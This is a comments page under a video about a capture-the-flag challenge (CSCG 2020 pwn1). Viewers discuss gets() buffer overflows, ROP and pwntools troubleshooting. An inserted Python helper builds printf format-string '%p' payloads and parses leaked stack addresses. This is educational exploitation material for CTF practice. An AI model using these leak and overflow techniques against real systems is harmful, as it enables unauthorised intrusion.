Mindmapping a Pwnable Challenge - intro_pwn/pwn1 CSCG 2020

  • Published on 1 Oct 2024

Comments • 89

  • @yakushitamahacka4199
    @yakushitamahacka4199 4 years ago +27

    This "Mindmapping" kind of video is amazing. It clearly shows how you have struggled with learning all these techniques and then trying to wrap everything up and create a formula for it. The fact that you also explain it so efficiently shows how knowledgeable you are. You are a true researcher. Thank you so much for explaining all those advanced techniques against your sanity and time. And always know that you really help those who have the same passion as you go a bit further.

  • @root317
    @root317 4 years ago +23

    You're a wizard Harry

  • @aditya95sriram
    @aditya95sriram 4 years ago +7

    Please do more of these. I have no intention of participating in a CTF but seeing the thought process behind these "hacks" is extremely fascinating (especially the way you lay it out - short and sweet).

  • @maxk9102
    @maxk9102 4 years ago +1

    Bro, someone has a PornHub account named LiveOverflow with some of your videos. Is that you?

  • @MisterL2_yt
    @MisterL2_yt 4 years ago +25

    9:30 Any particular reason why you favour this way of generating a string over using i.e.
    "%p" * 50
    In full i.e. ("|%p" * 50) [1:]

    • @column.01
      @column.01 4 years ago +13

      How is this comment a week old when the video just went live? That's the real question

    • @MisterL2_yt
      @MisterL2_yt 4 years ago +3

      @@column.01 This video was available to everyone who participated in the CTF

    • @MisterL2_yt
      @MisterL2_yt 4 years ago +2

      @Zaino Dre No, this wasn't through patreon. It was available for anyone who did the CTF

    • @0xff0x09
      @0xff0x09 4 years ago

      MisterL2 it's to add spaces between the values returned by printf, but to remove the first space. [1:] slices the string so that it removes only the first character

    • @MisterL2_yt
      @MisterL2_yt 4 years ago +1

      @@0xff0x09 but my solution also adds the '|' separator?
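The two payload builders discussed in this thread, the `"|".join(["%p"] * n)` form and the `("|%p" * n)[1:]` form, produce the same string; what matters afterwards is turning the program's reply back into numbers. The following is an added example (not code from the video, the challenge or any commenter) that builds the payload both ways, parses a `printf("%p")` reply, and locates the stack word holding our own marker bytes. It assumes Python 3 and a target that echoes the input through `printf()`; the sample reply is constructed, not captured from the real binary.

```python
"""Format-string leak helper (added example; not code from the video or the thread).

Assumes the target echoes our input through printf(), so N "%p" specifiers
print N stack words separated by the chosen separator. Two equivalent payload
builders are shown (the join form and the slice form from the thread), plus a
parser that turns the reply back into integers and finds the word that holds
our own marker bytes, which tells us where the input buffer sits on the stack.
"""

SEP = "|"
MARKER = "AAAAAAAA"  # 8 bytes, so it fills exactly one 64-bit stack word


def build_payload_join(n=50, marker=MARKER, sep=SEP):
    """marker + '%p|%p|...|%p' built with str.join."""
    return marker + sep.join(["%p"] * n)


def build_payload_slice(n=50, marker=MARKER, sep=SEP):
    """Same payload built the way the comment suggests: repeat '|%p' and drop
    the leading separator with [1:]."""
    return marker + ((sep + "%p") * n)[1:]


def parse_leak(reply, marker=MARKER, sep=SEP):
    """Parse printf('%p') output back into ints; glibc prints NULL as '(nil)'."""
    reply = reply.strip()
    if not reply.startswith(marker):
        raise ValueError("reply does not start with the marker")
    values = []
    for tok in reply[len(marker):].split(sep):
        tok = tok.strip()
        if tok == "(nil)":
            values.append(None)
        elif tok.startswith("0x"):
            values.append(int(tok, 16))
        else:
            raise ValueError("unexpected token: %r" % tok)
    return values


def marker_word(marker=MARKER):
    """The integer printf shows for a little-endian stack word filled with `marker`."""
    return int.from_bytes(marker.encode(), "little")


def find_marker(values, marker=MARKER):
    """0-based %p index of the word equal to the marker bytes, or -1 if absent."""
    target = marker_word(marker)
    for i, v in enumerate(values):
        if v == target:
            return i
    return -1


# Constructed sample reply (not captured from the real binary): five leaked
# words, the fourth of which is the marker bytes of our own input.
SAMPLE_REPLY = (
    "AAAAAAAA0x7ffd2e5a1b40|(nil)|0x7f3c1a2b3c4d|"
    "0x4141414141414141|0x7ffd2e5a1c90\n"
)


if __name__ == "__main__":
    assert build_payload_join() == build_payload_slice()
    leaked = parse_leak(SAMPLE_REPLY)
    for i, v in enumerate(leaked):
        print("%%p #%d: %s" % (i, "(nil)" if v is None else hex(v)))
    print("marker found at %%p index %d" % find_marker(leaked))
```

Remember that on x86-64 the first five `%p` specifiers read the remaining argument registers (rsi, rdx, rcx, r8, r9) before `printf` starts pulling words off the stack, so the index returned by `find_marker` is a `%p` index, not a byte offset divided by eight.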

  • @Pentestingwithspirit
    @Pentestingwithspirit 4 years ago +8

    Nice one mate, xD and the last line "suffering is a huge part" is just damn true haha

  • @RiyadhElalami
    @RiyadhElalami 4 years ago +2

    Maybe it is too early in our relationship but I love you

  • @brettnieman3453
    @brettnieman3453 4 years ago +5

    will watch this a bunch more when I'm working on OSCE labs. Keep up the great videos, thanks!

  • @super3d201
    @super3d201 4 years ago +1

    Your channel is really awesome.
    I have a question and I hope you or someone else here reads this:
    So I landed my first IT job. It's pretty basic stuff. Some helpdesk calls, a bit of Active Directory administration, some Azure administration, some networking stuff. Everything pretty first-level supportish.
    As I said, I'm new to your channel, so I wonder which video series I should start with. What makes the most sense for a relative beginner?

  • @privateger
    @privateger 4 years ago +2

    My god. And here I was thinking this would be an easy challenge for minors.
    Well, looks like this will be fun. :)

  • @testiyyy33
    @testiyyy33 4 years ago +5

    Okay. I'm done xD My brain is on fire

  • @danthe1st
    @danthe1st 4 years ago +6

    Buffer overflow with _gets()_
    Here we go again...

    • @ceilingfun2182
      @ceilingfun2182 4 years ago +1

      Zen Waichi That's not how the real world works (I'm not sure).

    • @waffle2446
      @waffle2446 4 years ago

      @Zen Waichi I'm assuming it's people not using gets()

    • @ceilingfun2182
      @ceilingfun2182 4 years ago

      get(bufferoverflow) portion of the video removed? I can’t find it anymore.

  • @MrKristian252
    @MrKristian252 4 years ago +1

    Counter Strike Offensive Global 2020

  • @LiEnby
    @LiEnby 4 years ago +1

    This video never came up in my subscriptions box...
    ugh, YouTube.

  • @mozark1043
    @mozark1043 4 years ago +1

    Absolutely love the mind mapping! Please keep doing this!

  • @Darieee
    @Darieee 4 years ago

    insanely nicely thought out tutorial / approach

  • @peterjohansson1828
    @peterjohansson1828 1 year ago

    That mind map is AMAZINGLY useful to a newbie like me

  • @Anonymous-vh6kp
    @Anonymous-vh6kp 4 years ago +1

    I can’t wait to try this out! You keep me inspired! Thank you for everything.

  • @flightvision
    @flightvision 4 years ago

    sudo docker makes me shiver. Please do not run docker containers elevated.

  • @prometheus05developer68
    @prometheus05developer68 3 years ago

    I figured out everything myself, but how to pass non-alphanumerical to the program

  • @mohamed_5765
    @mohamed_5765 4 years ago

    Hacking = knowledge+++++++
    Don't forget to replace knowledge by "PRACTICAL KNOWLEDGE".

  • @AbdelrahmanRashed
    @AbdelrahmanRashed 4 years ago

    So helpful. I didn't think I would figure out the null byte string terminator trick, but I actually figured it out while you were explaining, before you said it! That means progress ^^ Good job me, and thanks LiveOverflow for the great content.

  • @joakoitria1991
    @joakoitria1991 4 years ago

    Hi, I have watched all your videos and that inspired me to enter this world.
    I have a question about another binary in the same category (CSCG 2020), RopNop; here it is: earth.2020.cscg.de/tasks/ropnop
    I have to call a shell, I think, and do it via syscall, which is given as a gadget, but there is a function which erases all ret instructions. And the same function calls mprotect to give write permission to the code segment, so I think that I can write a ret instruction. But when I try to write, I get a SIGSEGV fault. I was trying all day to solve it. I am new in this world, so I would be very grateful if you could answer this question.

  • @masonp1314
    @masonp1314 4 years ago

    Reminds me of a computer class I had in high school that was teaching us about security.
    They used a very similar gets function in their grade system, and didn't scrub inputs. Little to say, I passed the class without doing a thing of their work.

  • @viralata6247
    @viralata6247 4 years ago

    Like your videos very much bro! Suffering and frustration is really true HAHAHAHA!

  • @2000YG
    @2000YG 4 years ago +2

    You could have made this video in german..... or am i missing something?

    • @LiveOverflow
      @LiveOverflow 4 years ago +13

      yeah. you miss everybody who doesn't speak german

    • @KtosZPlanetyZiemia
      @KtosZPlanetyZiemia 4 years ago

      @@LiveOverflow Thanks

  • @linuztri
    @linuztri 4 years ago +1

    Can I know which gdb interface you are using, sir?

    • @byrfchannel
      @byrfchannel 4 years ago

      That's pwndbg github.com/pwndbg/pwndbg. You could also like this one (GDB-peda) github.com/longld/peda

  • @wouterr6063
    @wouterr6063 4 years ago

    Be sure to install pwndbg if you're doing it without docker.

  • @randomgrapesoda
    @randomgrapesoda 4 years ago

    One thing I don't understand, you needed to know the password to bypass the strcmp check, whereas if you didn't have access to the binary or the source, you wouldn't have known the password. Would there be another way to solve that problem?

    • @derysf
      @derysf 4 years ago

      Don't know if it works with this binary in detail, but Blind ROP, aka BROP, can be a way. There is a very good paper online from Stanford University explaining it: www.scs.stanford.edu/~sorbo/brop

  • @fledermaus7061
    @fledermaus7061 4 years ago

    I didn't think I had to leak so many values. I had only 8 %p's and I calculated for so long. I'm so happy that I didn't miscalculate something.

  • @jacobjake683
    @jacobjake683 4 years ago

    Why use docker when you could just use linux?

  • @nullnull6032
    @nullnull6032 4 years ago

    Love it

  • @lp-xw9ve
    @lp-xw9ve 4 years ago +1

    I have the problem that I always get "[*] Got EOF while reading in interactive" when executing the python script after I already redirected to WIN. It also prints "You are a slytherin" but after that it just shows the EOF message. It works fine when I just execute ./pwn1 but not when connecting to 127.0.0.1:9100. How can I fix this?

    • @rootabeta9015
      @rootabeta9015 4 years ago

      You mention executing pwn2 - are you sure you're using the right exploit?

    • @lp-xw9ve
      @lp-xw9ve 4 years ago

      @@rootabeta9015 sorry of course I meant pwn1

    • @rootabeta9015
      @rootabeta9015 4 years ago

      May I see your exploit code? A pastebin link is fine.

    • @lp-xw9ve
      @lp-xw9ve 4 years ago

      @@rootabeta9015 pastebin.com/wm4Rdbs3 this is the python exploit file

    • @TheVampirePlaysMc
      @TheVampirePlaysMc 4 years ago

      I have the same problem, did you manage to solve it?

  • @yuvaldahan642
    @yuvaldahan642 4 years ago

    Is there still any particular advantage to using python 2? pwntools is available for python 3

    • @LiveOverflow
      @LiveOverflow 4 years ago +1

      probably not. I'm just lazy

  • @hakienet3897
    @hakienet3897 4 years ago

    Thank you for another amazing video

  • @grindinglcmeow
    @grindinglcmeow 4 years ago

    WINgardium leviosa lol, love it !

  • @tatmush9621
    @tatmush9621 4 years ago

    liveoverflow, uri mboko hanty?

  • @DawnnDusk-k4n
    @DawnnDusk-k4n 4 years ago

    Are you safe out there bro...?😢

  • @pwlegolas3
    @pwlegolas3 4 years ago

    The word is Awesome... Live Overflow... Keep it up !!

  • @christosdemetriou1970
    @christosdemetriou1970 4 years ago

    For some reason i was able to execute the WIN function without dealing with unaligned addresses, worked locally but kept crashing on the remote. Any ideas as to why?

    • @LiveOverflow
      @LiveOverflow 4 years ago

      Because you don’t use the same setup as shown in the video. You use a different Linux distribution. I even say that in this or the previous video

    • @christosdemetriou1970
      @christosdemetriou1970 4 years ago

      Thank you. Do you also know why "[*] Got EOF while in interactive" appears? I've stripped my strings and such.

  • @nullnull6032
    @nullnull6032 4 years ago

    Will this code still be exploitable if the stack canary was enabled?

    • @LiveOverflow
      @LiveOverflow 4 years ago +1

      Stack canary is enabled here in the next level

  • @StolenPixel
    @StolenPixel 4 years ago

    Amazing video

  • @RC-14
    @RC-14 4 years ago

    I haven't seen the video yet, but:
    do we have to solve this as you guys want us to?
    Or can we just do something you might not have thought about (not solving but ignoring the real challenge and just spawning a root shell or something like that...)

    • @pablu3880
      @pablu3880 4 years ago

      Well can you spawn a root shell on the server where the actual flag is stored?

    • @RC-14
      @RC-14 4 years ago

      @@pablu3880 I didn't try, and I think I'm not able to spawn a root shell and also don't want to do (/solve) it that way, but I wanted to know if we have to solve it like you want us to, because if someone discovers a bug to do it another way that's way easier, you would just fix it.
      I'm definitely not a pro, but I (more or less) accidentally destroy important things sometimes, and these important things are usually security related...
      That's why I asked (sorry if it just annoys you).
      Because of your question, I think you would just fix it if it is dangerous to the server.

    • @pablu3880
      @pablu3880 4 years ago

      No, I really don't know if you can, that's why I asked. I don't have any clue :)

    • @Pharisaeus
      @Pharisaeus 4 years ago

      CTF is a CTF, the flag is what counts ;) However, in 99% of cases each challenge is running on an up-to-date OS, with its own docker inside nsjail and with sufficient hardening that it is impossible to root the box or pivot to a different challenge. So unless you have a Linux 0day, I doubt you can do anything weird.

  • @tymekl1509
    @tymekl1509 4 years ago

    64th

  • @fedemolto
    @fedemolto 4 years ago

    Great video!

  • @feifeilooper8312
    @feifeilooper8312 4 years ago

    Suffering 🤨

  • @danielbenisti3664
    @danielbenisti3664 4 years ago

    What does pwn mean?

  • @marwynthemage
    @marwynthemage 4 years ago

    Awesome project :)

  • @Timo-gk6dw
    @Timo-gk6dw 4 years ago

    Can someone please tell me which IDE he is using in the video?

  • @MrHatoi
    @MrHatoi 4 years ago

    Imagine using python2 in 2020, kind of cringe

  • @ashutoshpanda4336
    @ashutoshpanda4336 4 years ago

    Hey man, how is your locality affected by COVID-19?

  • @krustydev8151
    @krustydev8151 4 years ago

    Can you also make videos in German? :D You can hear your accent hehe

  • @__________________________177
    @__________________________177 4 years ago +1

    First hahahahaha